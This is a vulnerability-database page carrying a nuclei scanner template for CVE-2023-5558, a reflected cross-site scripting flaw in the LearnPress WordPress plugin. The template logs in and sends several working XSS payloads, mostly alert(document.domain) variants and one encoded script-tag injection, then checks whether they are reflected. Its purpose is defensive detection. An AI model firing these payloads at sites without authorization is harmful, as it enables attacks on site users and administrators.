Lucene search
K

LearnPress < 4.2.5.5 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

LearnPress < 4.2.5.5 - Cross-Site Scripting, Reflected XSS, affects high privilege user

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-5558
23 Jan 202417:17
circl
CNNVD
WordPress plugin LearnPress Security Vulnerability
16 Jan 202400:00
cnnvd
CVE
CVE-2023-5558
16 Jan 202415:54
cve
Cvelist
CVE-2023-5558 LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
16 Jan 202415:54
cvelist
NVD
CVE-2023-5558
16 Jan 202416:15
nvd
OSV
CVE-2023-5558
16 Jan 202416:15
osv
Prion
Cross site scripting
16 Jan 202416:15
prion
Positive Technologies
PT-2024-14817 · WordPress · Learnpress
16 Jan 202400:00
ptsecurity
RedhatCVE
CVE-2023-5558
23 May 202505:07
redhatcve
Vulnrichment
CVE-2023-5558 LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
16 Jan 202415:54
vulnrichment
Rows per page
id: CVE-2023-5558

info:
  name: LearnPress < 4.2.5.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Allows attackers to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5558
    cwe-id: CWE-79
    epss-score: 0.00916
    epss-percentile: 0.55791
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 6
    vendor: thimpress
    product: learnpress
    framework: wordpress
  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "/wp-content/plugins/learnpress"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - '?param=value%22%27%3Balert(document.domain)%3C!--'
        - '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
        - '?%27-alert(%60XSS%60)-%27=a'
        - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"';alert(document.domain)<!--"
          - "\"';alert(document.domain);b='"
          - "'-alert(`XSS`)-'=a"
          - "</script><script>alert`document.domain`</script>"
        condition: or

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d331292d4851c7b9835fb0a7619bd0482a0428141b93d24f5bdc7dc0a136033402201436209b6a7e52ddaeaf88b0380182034a8426eb46ef3ced88fd96719a4d3ea9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00916
SSVC
21